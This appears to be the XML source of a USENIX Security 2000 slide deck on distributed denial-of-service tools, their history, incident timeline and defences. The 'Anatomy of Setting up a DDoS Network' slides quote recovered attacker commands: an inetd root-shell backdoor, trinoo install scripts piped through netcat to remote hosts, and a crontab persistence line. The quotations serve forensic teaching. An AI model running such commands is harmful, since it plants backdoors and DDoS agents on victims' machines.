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10080625" cy="7559675"/>
  <p:notesSz cx="7772400" cy="10026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74400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="7689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804680" y="4994640"/>
            <a:ext cx="7689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4400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="37526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45240" y="2507760"/>
            <a:ext cx="37526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04680" y="4994640"/>
            <a:ext cx="37526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745240" y="4994640"/>
            <a:ext cx="37526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74400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="2476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04960" y="2507760"/>
            <a:ext cx="2476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005240" y="2507760"/>
            <a:ext cx="2476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804680" y="4994640"/>
            <a:ext cx="2476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404960" y="4994640"/>
            <a:ext cx="2476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005240" y="4994640"/>
            <a:ext cx="2476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74400" y="626760"/>
            <a:ext cx="8072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804680" y="2507760"/>
            <a:ext cx="7689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4400" y="626760"/>
            <a:ext cx="8072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804680" y="2507760"/>
            <a:ext cx="7689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4400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="37526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745240" y="2507760"/>
            <a:ext cx="37526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4400" y="626760"/>
            <a:ext cx="8072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74400" y="626760"/>
            <a:ext cx="8072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4400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="37526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45240" y="2507760"/>
            <a:ext cx="37526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804680" y="4994640"/>
            <a:ext cx="37526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74400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="37526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45240" y="2507760"/>
            <a:ext cx="37526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45240" y="4994640"/>
            <a:ext cx="37526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74400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="37526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45240" y="2507760"/>
            <a:ext cx="37526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804680" y="4994640"/>
            <a:ext cx="7689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3760" cy="7558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4400" y="626760"/>
            <a:ext cx="8072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04680" y="2507760"/>
            <a:ext cx="7689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6920" indent="-43200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55640" indent="-43164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55640" indent="-43164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55640" indent="-43164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ittrich@cac.washington.edu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USENIX SEC2000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527120" y="2190240"/>
            <a:ext cx="7689960" cy="44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 algn="ctr"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ed Denial of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re Really a Threa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Dit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Washing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ittrich@cac.washington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staff.washington.edu/ditt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 Brief History of Do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04680" y="2508120"/>
            <a:ext cx="7689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attack (co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FN2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ttacks as TFN, but can randomly do them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 added to improve security of control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n *nix, Windows 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raffic uses UDP, TCP, or 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source address forgery features as T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 Brief History of Do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04680" y="2508120"/>
            <a:ext cx="7689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attack (co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heldraht/stacheldraht v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ontrol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ed client/handler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basic attacks as T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raffic uses TCP and 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source address forgery as TFN/TFN2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 Brief History of Do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04680" y="2508120"/>
            <a:ext cx="7689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attack (co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heldraht v2.666 (not publically discus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er bugs than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basic attacks as stacheldra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TCP ACK flood ("stream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TCP NULL (no flags) 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"smurf" attack w/16,702 amplifiers (alread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et_ato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for speed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source address forgery features as stacheldraht/TFN/TFN2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 Brief History of Do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04680" y="2508120"/>
            <a:ext cx="7689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ributed attack (co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ll control features (plus sta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ol traffic uses TCP and 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DP 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CP SYN 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CMP Echo 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randomize all three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 Brief History of Do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04680" y="2508120"/>
            <a:ext cx="7689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attack (co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limited control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” attack (TCP ACK fl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all 32 bits of source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 Brief History of Do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689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8240" indent="-42768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ributed attack (co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732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megav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840" indent="-42768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ol traffic uses TCP, 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840" indent="-42768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ll control (supports 10 users by nick, with talk and sta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840" indent="-42768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am” attack (TCP ACK fl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840" indent="-42768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CMP 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840" indent="-42768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GMP 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840" indent="-42768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DP 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840" indent="-42768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t in update us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80"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DDoS Attack Tool Timelin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77680" y="2044440"/>
            <a:ext cx="768996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ay/June 1998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- First primitive DDoS tools developed in the under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July 22, 1999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- CERT releases Incident Note 99-04 mentioning widespread intrusions on Solaris RPC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ugust 5, 1999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- First evidence seen at UW of programs being installed on mass-compromised Solaris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ugust 17, 1999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- Attack on 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DDoS Attack Tool Timelin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440" y="2003040"/>
            <a:ext cx="76896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73040" indent="-40608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ptember 2, 19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Contents of compromised account used to cache files recov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0608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ptember 27, 19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CERT provided with first draft of Trinoo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0608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arly October, 19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CERT reviews hundreds of reports and finds they fit Trinoo analysis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0608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ctober 15, 19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CERT mails out invitations to DSIT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DDoS Attack Tool Timelin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77680" y="1812600"/>
            <a:ext cx="76899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93200" indent="-42336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ctober 23, 19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Final drafts of Trinoo and TFN analyses finished in preparation for DSIT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3200" indent="-42336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vember 2-4, 19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DSIT workshop in Pittsburgh.  Attendees agree to not disclose DDoS information until final report complete (Don't want to panic Intern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3200" indent="-42336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vember 18, 19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CERT releases Incident Note 99-07 mentioning DDoS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DDoS Attack Tool Timelin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819440" y="2166480"/>
            <a:ext cx="7689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vember 29, 19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SANS NewsBytes Vol. 1, No. 35, mentions trinoo/TFN in context of widespread Solaris intrusion reports, consistent with IN-99-07 and involving ICMP Echo Reply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ember 7, 19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ISS releases advisory on the heals of USA Today article, CERT rushes out final report, I publish my trinoo/TFN analyses on BUGTRA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DDoS: Is There Really a Threat?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489560" y="1801800"/>
            <a:ext cx="5014800" cy="52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rief history of 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DoS attack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they do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they do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llowed this to hap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we supposed to do to stop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is this all hea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we need? (IMH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62080" y="2000160"/>
            <a:ext cx="2989080" cy="47228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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name=""/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2620800" y="1166760"/>
            <a:ext cx="5015160" cy="4762440"/>
            <a:chOff x="2620800" y="1166760"/>
            <a:chExt cx="5015160" cy="4762440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2620800" y="1166760"/>
              <a:ext cx="5015160" cy="47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DDoS Attack Tool Timelin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60120" y="1922040"/>
            <a:ext cx="76899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ember 8, 19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(According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SA Tod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NIPC sends note briefing FBI Director Louis Free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ember 17, 19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(According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SA Tod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NIPC director Michael Vatis briefs Attorney General Janet Reno as part of Y2K preparation over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ember 27, 19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Scan of UW network testing "gag" identifies 3 stacheldraht agents (leads to uncovering 100+ ag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DDoS Attack Tool Timelin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440" y="2017440"/>
            <a:ext cx="7689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ember 28, 19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CERT releases Advisory 99-17 on Denial-of-Service tools (covers TFN2K and MacOS 9 explo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ember 30, 19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I publish analysis of stacheldraht on BUGTRAQ, NIPC issues a press release on DDoS and tool for scanning local file systems/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ember 31, 19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Nothing happens except fireworks and people getting dr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DDoS Attack Tool Timelin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46440" y="2031840"/>
            <a:ext cx="7689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anuary 3, 2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CERT and FedCIRC jointly publish Advisory 2000-01 on Denial-of-Service developments (discusses Stacheldraht and NIPC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anuary 4, 2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SANS asks it membership to use scanning tools to identify scope of DDoS networks, reports of successful scans start coming in within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DDoS Attack Tool Timelin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04680" y="1990440"/>
            <a:ext cx="7689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anuary 5, 2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Sun releases bulletin #00193, "Distributed Denial of Service Tool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anuary 14, 2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ttack on OZ.net in Seattle affects Semaphore and UUNET customers (as much as 70% of PNW feels it, possibly other US victi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anuary 17, 2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ICSA.net hosts DDoS BoF at RSA 2000 in San J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DDoS Attack Tool Timelin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19440" y="2180880"/>
            <a:ext cx="7689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ebruary 7, 2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Steve Bellovin discusses DoS at NANOG meeting in San Jose, ICSA.net holds another DDoS BoF, first eCommerce attacks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ebruary 8, 2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ttacks on eCommerce sites continue, media feeding frenzy begi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DDoS Attack Tool Timelin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440" y="1990440"/>
            <a:ext cx="7689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t points on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details of DDoS tools not in hands of CERT/feds until late Sept./early Oct.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took CERT time to review hundreds of incidents and re-corre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 announced DDoS tools in mid Nov.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TRAQ readers learned of trinoo/TFN on December 7, 1999, stacheldraht on December 30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DDoS Attack Tool Timelin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36280" y="2003040"/>
            <a:ext cx="7689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t points on timeline (co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PC's advisory and tool came out right after technical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ional media paid no attention to UMN being offline for three days, and little attention of OZ.net attack (or similar DDoS incidents after February 8 -- New Zealand, Brazil, NHL web site, irc.stealth.net, British Telecom, Win Trinoo, 250 Korean (agent) systems..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itial Intrusions (Phase 1)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440" y="1909440"/>
            <a:ext cx="7689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root compromise ori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1436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No charge" IS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6440" indent="-41472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account "guest", password "passwor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6440" indent="-41472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UP, no user records, no caller-ID, no trap&amp;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1436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d systems in Korea, Germany, Sweden, Jamaica, UK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1436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d name servers, web servers, "at home" systems, software development companies, "day trading" companies, eCommerce sites, ISPs, NASA, .mil systems... you nam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itial Intrusions (Phase 1)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77680" y="2112840"/>
            <a:ext cx="7689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x7 sc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ft into sets of OS/architecture/vuln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k in wav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ploit, backdoor, load agent, lather, rinse, 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"root kits" to conceal processes, files, conn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DDoS Attacks (Phase 2)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04680" y="2099880"/>
            <a:ext cx="7689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tim network(s) become non-respo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look like hardware failure on back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ites not prepared to analyze packets (e.g.,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cpdum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of agents diffic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e with upstream providers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stream providers better positioned to gather forensic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 Brief History of Do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47440" y="2053800"/>
            <a:ext cx="7689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73040" indent="-40608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assic resource con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40572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haust disc space, recursive direc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40572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k(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0608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mote resource con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40572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gment re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40572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legal TCP fl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40572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N f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40572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s: synk, stream, slice, teardrop, jolt, bonk, pep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DDoS Attacks (Phase 2)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280" y="2003040"/>
            <a:ext cx="7689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k may/may not be noticed on agent networks (e.g., subnet saturated, but backbone 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-200 systems can knock a large site off the network comple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attacking systems/networks means long time to neutr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party effects (e.g, RST|ACK packets) felt else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4400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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04680" y="2508120"/>
            <a:ext cx="7689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ugust 1999, a network of &gt; 2,200 systems took University of Minessota offline for 3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s found cached at Canadian SW fi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1,660 system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.doma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549 system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,209 potentia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4400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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886200"/>
            <a:ext cx="731196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/r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh -i'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&gt; /tmp/bob ; /usr/sbin/inetd -s /tmp/bob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/r -6  $1 "echo 'ingreslock stream tcp nowait root /bin/sh -i'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&gt; /tmp/bob ; /usr/sbin/inetd -s /tmp/b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Sleeping for 2 second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e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lnet $1 15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04680" y="2508120"/>
            <a:ext cx="7689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ning for known vulnerabilities, then hitting them with scripted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4400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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04680" y="2508120"/>
            <a:ext cx="7689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compromised, script the installation of the DDoS agents (100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751200"/>
            <a:ext cx="82854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/trin.sh | nc 128.172.XXX.XXX 1524 &amp;   XXXXXX.egr.vc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/trin.sh | nc 128.172.XXX.XXX 1524 &amp;   XXXXXX.egr.vc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/trin.sh | nc 128.172.XXX.XXX 1524 &amp;   XXXXXX.egr.vc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/trin.sh | nc 128.172.XXX.XX 1524 &amp;    XXXXXXXX.mas.vc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/trin.sh | nc 128.3.X.XX 1524 &amp;        XXXXXXXX.lbl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/trin.sh | nc 128.3.X.XX 1524 &amp;        XXXXXXX.lbl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/trin.sh | nc 128.3.X.XXX 1524 &amp;       XXXXXX.lbl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/trin.sh | nc 128.173.XX.XX 1524 &amp;     XXXXXX.cns.vt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/trin.sh | nc 128.173.XX.XX 1524 &amp;     XXXXXXX.cns.vt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/trin.sh | nc 128.173.XX.XXX 1524 &amp;    XXXXX.cns.vt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4400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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04680" y="2508120"/>
            <a:ext cx="7689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ript being piped to netc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47880" y="3294000"/>
            <a:ext cx="775188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rcp 192.168.0.1:leaf /usr/sbin/rpc.liste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echo rcp is done moving binary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chmod +x /usr/sbin/rpc.liste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echo launching trinoo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/usr/sbin/rpc.liste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echo \* \* \* \* \* /usr/sbin/rpc.listen &gt; cro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crontab cro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echo launched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exi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4400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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04680" y="2044440"/>
            <a:ext cx="7689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history file (December 19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65400" y="2700360"/>
            <a:ext cx="866592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+09461312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s -u root -e | grep ttymon | awk '{print "kill -9 "$1}' &gt; .tmp &amp;&amp; chmod 755 ./.tmp &amp;&amp; ./.tmp &amp;&amp; rm -f .tmp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+09461312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 -rf /usr/lib/libx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+09461312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kdir /usr/lib/libx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+09461312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kdir /usr/lib/libx/...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+09461312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d /usr/lib/libx/.../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+09461312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cp root@XXXXX.XXXXXXXX.lu.se:td ttymon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+09461312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hup ./ttymon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+09461312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 -rf ./ttymon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74400" y="611280"/>
            <a:ext cx="80722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natomy of Setting up a DDoS Network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66440" y="2172960"/>
            <a:ext cx="7689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root: just over 3 seconds!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3-6 seconds per host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4 hours to set up 2,200+ agent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these were all Internet 2 si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ning still would tak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68640" y="2728800"/>
            <a:ext cx="62690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ctime 09461312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t Dec 25  6:14:01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ctime 09461312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t Dec 25  6:14:04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y?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0680" y="2153880"/>
            <a:ext cx="7689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result of IRC channel takeovers &amp; retal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e if they c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ime it may not be teenagers, and it may happen at a very "inopportune" mo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8072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y?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68996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93200" indent="-42336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more to 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2300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RC on Your D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AC Document 23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2300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ackers: Crime in the Digital Sublime,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. Paul A. Taylor, Routledge, ISBN 0-415-18072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2300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sters of Deception: The Gang that Ruled Cybersp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helle Slatalla and Joshua Quitnet, Haper Perennial, ISBN 0-06-017030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2300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nderground: Tales of Hacking, Madness and Obsession on the Electronic Front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elette Dreyfus, Mandarin [Reed Books Australia], ISBN 1-86330-595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2300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@Large: The Strange Case of the World's Biggest Internet Invasion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les C. Mann &amp; David H. Freedman, Simon&amp; Schuster Trade, ISBN 0-684-82464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at allowed this to happen?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14600" y="1787040"/>
            <a:ext cx="768960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93200" indent="-42336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arget rich environment" (getting ric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3200" indent="-42336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d/complexity of intrusions overwhel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3200" indent="-42336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"root kits" exceeds average admin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3200" indent="-42336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or understanding of network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3200" indent="-42336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focus on restoration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3200" indent="-42336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UDP, ICMP, etc. hard to detect/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 Brief History of Do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68960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88160" indent="-41904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ation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41868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240" indent="-41904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k, jolt, nestea, newtear, syndrop, teardrop, winnu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41868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240" indent="-41904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rdrop v2, newtear, boink, bonk, frag, fucked, troll icmp, troll udp, nestea2, fusion2, peace keeper, arnudp, nos, nuclear, sping, pingodeth, smurf,  smurf4, land, jolt, pe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8160" indent="-41904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ed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8160" indent="-41904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at allowed this to happen?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0680" y="1868040"/>
            <a:ext cx="768996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and OSs designed with ease of use over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s still built using "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ick any two: Fast, Available, Sec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of firewalls or IDS at network borders, "net flows" about the only way to detect any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or system/network forensic tools and skills means no ide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4400" y="611280"/>
            <a:ext cx="80722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at are we supposed to do about it?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0680" y="2044800"/>
            <a:ext cx="768996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osed solutions fall into several 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st vs.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vent vs. Detect vs. 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efit you, Others, or Every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lement before, during, or after at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“solution” combines ALL of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4400" y="611280"/>
            <a:ext cx="80722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at are we supposed to do about it?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50680" y="2044800"/>
            <a:ext cx="768996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Ingress/Egress filtering (RFC 2267 and SANS'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gress Filtering v0.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 limiting and unicast reverse path forwarding (e.g., Cisc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ategies to Protect Against Distributed Denial of Service Atta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Intrusion Detection capabilities (e.g., use Sn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t hosts for DDoS tools (e.g., NIPC </a:t>
            </a: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find_dd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4400" y="611280"/>
            <a:ext cx="80722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at are we supposed to do about it?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440" y="2234880"/>
            <a:ext cx="7689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8240" indent="-42768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n Incident Response Team (I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240" indent="-42768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/enforce policies for securing hosts on your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240" indent="-42768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good working relationship with your upstream provider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240" indent="-42768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 insurance to cover service disru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240" indent="-42768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separate "netops"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240" indent="-42768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4400" y="611280"/>
            <a:ext cx="80722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at are we supposed to do about it?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63280" y="2303280"/>
            <a:ext cx="7689960" cy="49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78080" indent="-4104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future "solution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4100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uncil of Europe'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raft Convention on Cyberc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4100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methods of attack packet traceback (e.g., IETF traceback wg, Steven Bellov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4100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Identity Protocol (Robert Moskowit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4100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control traffic "out of band" (Bruce Schne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4100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G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4100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company incen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ere is this all heading?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19440" y="2276280"/>
            <a:ext cx="7689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 million hosts added to the Internet each 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 ad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1 million new sysadm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iciency of compromise incr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s for post-compromise concealment impr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DoS tools are evolving (fourth generation seen in less than 2 ye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ere is this all heading?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63280" y="2195640"/>
            <a:ext cx="76899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enforcement lobbying for stronger laws, greater powers of search &amp; seiz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/OS vendors lobbying for no government regulation or oversigh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know what is be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customers, righ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ward pressure on bu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vy pressure to increase business use of the Internet (Can you say "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irel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s given little choice to op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at to we need? (IMHO)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04680" y="2508120"/>
            <a:ext cx="7689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organization needs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ief Hacking Offi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 tha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ystem admins are essent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New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 community must acknowledge security as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st of doing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designers c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 longer put speed and access above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at to we need? (IMHO)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804680" y="2508120"/>
            <a:ext cx="7689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/OS vendors mus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dopt the same kinds of standards and practices as other mature indust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.g., auto, air tran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knowledge the Internet is not robust enough for "critical" serv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y what it takes to make it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computer industry doesn't want government regulation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op whining and address the security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at to we need? (IMHO)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04680" y="2508120"/>
            <a:ext cx="7689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 hear "cut taxes" one more time I'm going to slap somebod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time to stop pandering to users' demands for services and features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rt teaching them how to survive on a hostil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Brief History of Do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65320" y="1625760"/>
            <a:ext cx="6021360" cy="5359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3760" y="-1099080"/>
            <a:ext cx="9205920" cy="836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End?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04680" y="2508120"/>
            <a:ext cx="7689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r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more information, se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http://staff.washington.edu\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/dittrich/misc/d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 Brief History of Do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14600" y="2336400"/>
            <a:ext cx="7689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83120" indent="-41472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1436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pi (May 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6440" indent="-41472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, TCP (SYN and ACK), ICMP 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6440" indent="-41472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Smurf"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6440" indent="-41472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n Windows and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6440" indent="-41472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6440" indent="-41472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lient spoofs src, the other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6440" indent="-41472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-in shell fe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6440" indent="-41472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designed for large networks (&lt;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6440" indent="-41472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easy to setup/contro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 Brief History of Do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09280" y="2393640"/>
            <a:ext cx="7689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attack (co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ck_them (ADM Crew, June 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emon (agent) written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(handler) is a shell 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MP Echo Reply flo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raffic uses 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andomize source to R.R.R.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ere 0&lt;=R&lt;=2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 Brief History of Do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120" y="2209680"/>
            <a:ext cx="7689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ributed attack (co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in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C source (Linux, Solaris, Iri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DP packet flo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source address for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ll control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ol traffic on TCP and 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4400" y="627120"/>
            <a:ext cx="8072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 Brief History of Do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768960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78080" indent="-4104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attack (co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41004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e Flood Network (TF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4104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4104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control features (like fuck_th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4104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raffic via ICMP Echo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4104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packet flood ("trinoo emulation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4104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 SYN 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4104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MP Echo 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4104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Smurf"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410400">
              <a:spcAft>
                <a:spcPts val="850"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarBat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randomizes all 32 bits of source address, or just last 8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01:33:26Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Mark McNair</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-08-16T06:24:56Z</dcterms:modified>
  <cp:revision>4</cp:revision>
  <dc:subject/>
  <dc:title>USENIX SEC2000</dc:title>
</cp:coreProperties>
</file>